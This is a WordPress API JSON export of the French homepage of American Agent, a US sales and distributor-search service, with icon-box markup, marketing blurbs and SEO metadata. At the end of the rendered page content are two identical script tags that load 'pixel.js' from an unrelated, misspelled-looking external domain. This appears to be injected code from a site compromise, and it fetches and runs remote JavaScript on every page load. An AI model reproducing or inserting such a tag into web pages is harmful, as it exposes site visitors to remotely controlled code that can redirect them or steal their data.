{"id":3122,"date":"2013-04-01T15:37:54","date_gmt":"2013-04-01T15:37:54","guid":{"rendered":"https:\/\/americanagent.com\/homepage-2\/"},"modified":"2014-09-18T12:40:56","modified_gmt":"2014-09-18T16:40:56","slug":"accueil-american-agent","status":"publish","type":"page","link":"https:\/\/americanagent.com\/fr\/","title":{"rendered":"Accueil &#8211; American Agent"},"content":{"rendered":"<div id='layer_slider_1'  class='avia-layerslider main_color avia-shadow  avia-builder-el-0  el_before_av_one_third  avia-builder-el-first  container_wrap sidebar_right'  style='height: 471px;'  ><\/div><div id='after_layer_slider_1'  class='main_color av_default_container_wrap container_wrap sidebar_right'  ><div class='container av-section-cont-open' ><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-3122'><div class='entry-content-wrapper clearfix'>\n<div  class='flex_column av-av_one_third-2a9015ff38129c418a3f2eafba3e9512 av_one_third  avia-builder-el-1  el_after_av_layerslider  el_before_av_one_third  avia-builder-el-first  first flex_column_div  '     ><article  class='iconbox iconbox_top av-av_icon_box-ec801417476f1fc84606687baa66db29  avia-builder-el-2  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Ic\u00f4ne : Recherche de distributeurs et importateurs am\u00e9ricains\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue803' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Recherche de distributeurs et importateurs am\u00e9ricains<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>Comment trouver et contacter des distributeurs et importateurs am\u00e9ricains<\/p>\n<div  class='avia-button-wrap av-av_button-edef3befe19395382632767fba199644-wrap avia-button-center  avia-builder-el-3  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/fr\/recherche-de-distributeurs-et-importateurs-americains\/'  class='avia-button av-av_button-edef3befe19395382632767fba199644 av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div>\n<div  class='flex_column av-av_one_third-cae1f7b2f72c6a5cdf3719c4a548253a av_one_third  avia-builder-el-4  el_after_av_one_third  el_before_av_one_third  flex_column_div  '     ><article  class='iconbox iconbox_top av-av_icon_box-dc5afc9a4724fb97f4275b2c255f842c  avia-builder-el-5  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Ic\u00f4ne : Vendre en direct aux \u00c9tats-Unis\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue881' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Vendre en direct aux \u00c9tats-Unis<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>American Agent\u00a0est en mesure de g\u00e9n\u00e9rer des efforts de ventes communautaires puissants et directs.<\/p>\n<div  class='avia-button-wrap av-av_button-ffdfbfa9ce2b8f72ac3af5a92434c500-wrap avia-button-center  avia-builder-el-6  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/fr\/vendre-directement-aux-etats-unis\/'  class='avia-button av-av_button-ffdfbfa9ce2b8f72ac3af5a92434c500 av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div>\n<div  class='flex_column av-av_one_third-cae1f7b2f72c6a5cdf3719c4a548253a av_one_third  avia-builder-el-7  el_after_av_one_third  el_before_av_one_third  flex_column_div  '     ><article  class='iconbox iconbox_top av-av_icon_box-fc3881ca2e473fe0a2e34a0919edb56e  avia-builder-el-8  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Ic\u00f4ne : Trouver votre repr\u00e9sentant vente aux \u00c9tats-Unis\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue80c' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Trouver votre repr\u00e9sentant vente aux \u00c9tats-Unis<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>Besoin de trouver les meilleurs commerciaux am\u00e9ricains\u00a0?<\/p>\n<div  class='avia-button-wrap av-av_button-31c9bb49e4cddbabf6d8f796daa8ddd7-wrap avia-button-center  avia-builder-el-9  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/fr\/recherche-de-representants-americains\/'  class='avia-button av-av_button-31c9bb49e4cddbabf6d8f796daa8ddd7 av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div>\n<div  class='flex_column av-av_one_third-2a9015ff38129c418a3f2eafba3e9512 av_one_third  avia-builder-el-10  el_after_av_one_third  el_before_av_one_third  first flex_column_div  column-top-margin'     ><article  class='iconbox iconbox_top av-av_icon_box-0acc99b2063cc4bf58cace63a328fd69  avia-builder-el-11  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Ic\u00f4ne : Bureau et support \u00e0 la vente\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue8c7' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Bureau et support \u00e0 la vente<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>Source de confiance pour des services ad-hoc et tiers.<\/p>\n<div  class='avia-button-wrap av-av_button-ef0924d26c4284b1f37c8eacd53a5025-wrap avia-button-center  avia-builder-el-12  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/fr\/bureau-et-support-a-la-vente\/'  class='avia-button av-av_button-ef0924d26c4284b1f37c8eacd53a5025 av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div>\n<div  class='flex_column av-av_one_third-cae1f7b2f72c6a5cdf3719c4a548253a av_one_third  avia-builder-el-13  el_after_av_one_third  el_before_av_one_third  flex_column_div  column-top-margin'     ><article  class='iconbox iconbox_top av-av_icon_box-10f083d96a6dbc61d81bf537ccca585d  avia-builder-el-14  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Ic\u00f4ne : Guide d\u2019entr\u00e9e sur le march\u00e9 Am\u00e9ricain\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue84e' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Guide d\u2019entr\u00e9e sur le march\u00e9 Am\u00e9ricain<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>L&#8217;objectif de ce Guide d&#8217;entr\u00e9e sur le march\u00e9 des \u00c9tats-Unis est de vous aider \u00e0 vous et \u00e0 votre entreprise \u00e0 d\u00e9terminer la meilleure strat\u00e9gie possible pour entrer sur le march\u00e9 am\u00e9ricain.<\/p>\n<div  class='avia-button-wrap av-av_button-ca0d4cb14b43f9aaf3fd9cbe7f624a33-wrap avia-button-center  avia-builder-el-15  avia-builder-el-no-sibling '><a href='http:\/\/usamarketguide.com\/fr\/produit\/usa-market-guide'  class='avia-button av-av_button-ca0d4cb14b43f9aaf3fd9cbe7f624a33 av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'  target=\"_blank\"  rel=\"noopener noreferrer\"  aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div>\n<div  class='flex_column av-av_one_third-cae1f7b2f72c6a5cdf3719c4a548253a av_one_third  avia-builder-el-16  el_after_av_one_third  avia-builder-el-last  flex_column_div  column-top-margin'     ><article  class='iconbox iconbox_top av-av_icon_box-fbfff46f05f1a6714d4e52c03a74a82e  avia-builder-el-17  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Ic\u00f4ne : Contacter\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue805' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Contacter<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p><span style=\"color: #666666;\">Nous sommes pr\u00eats \u00e0 cr\u00e9er une solution personnalis\u00e9e pour r\u00e9pondre \u00e0 vos\u00a0besoins commerciaux individuels.<\/span><\/p>\n<div  class='avia-button-wrap av-av_button-c6dadd84bea34c0661d3f8749d959f2a-wrap avia-button-center  avia-builder-el-18  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/fr\/contacter\/'  class='avia-button av-av_button-c6dadd84bea34c0661d3f8749d959f2a av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>This is a Page excerpt. It will be displayed for search results<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3122","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>American Agent - Ventes aux \u00c9tats-Unis<\/title>\n<meta name=\"description\" content=\"Vendre en direct aux \u00c9tats-Unis, Recherche de distributeurs et importateurs am\u00e9ricains. Besoin de trouver les meilleurs commerciaux am\u00e9ricains ?\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/fr\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"American Agent - Ventes aux \u00c9tats-Unis\" \/>\n<meta property=\"og:description\" content=\"Vendre en direct aux \u00c9tats-Unis, Recherche de distributeurs et importateurs am\u00e9ricains. Besoin de trouver les meilleurs commerciaux am\u00e9ricains ?\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/fr\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-18T16:40:56+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/\",\"name\":\"American Agent - Ventes aux \u00c9tats-Unis\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/#website\"},\"datePublished\":\"2013-04-01T15:37:54+00:00\",\"dateModified\":\"2014-09-18T16:40:56+00:00\",\"description\":\"Vendre en direct aux \u00c9tats-Unis, Recherche de distributeurs et importateurs am\u00e9ricains. Besoin de trouver les meilleurs commerciaux am\u00e9ricains ?\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/fr\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Accueil &#8211; American Agent\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"American Agent - Ventes aux \u00c9tats-Unis","description":"Vendre en direct aux \u00c9tats-Unis, Recherche de distributeurs et importateurs am\u00e9ricains. Besoin de trouver les meilleurs commerciaux am\u00e9ricains ?","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/fr\/","og_locale":"fr_FR","og_type":"article","og_title":"American Agent - Ventes aux \u00c9tats-Unis","og_description":"Vendre en direct aux \u00c9tats-Unis, Recherche de distributeurs et importateurs am\u00e9ricains. Besoin de trouver les meilleurs commerciaux am\u00e9ricains ?","og_url":"https:\/\/americanagent.com\/fr\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-18T16:40:56+00:00","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/fr\/","url":"https:\/\/americanagent.com\/fr\/","name":"American Agent - Ventes aux \u00c9tats-Unis","isPartOf":{"@id":"https:\/\/americanagent.com\/fr\/#website"},"datePublished":"2013-04-01T15:37:54+00:00","dateModified":"2014-09-18T16:40:56+00:00","description":"Vendre en direct aux \u00c9tats-Unis, Recherche de distributeurs et importateurs am\u00e9ricains. Besoin de trouver les meilleurs commerciaux am\u00e9ricains ?","breadcrumb":{"@id":"https:\/\/americanagent.com\/fr\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/fr\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/fr\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Accueil &#8211; American Agent"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/fr\/#website","url":"https:\/\/americanagent.com\/fr\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages\/3122","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/comments?post=3122"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages\/3122\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/media?parent=3122"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}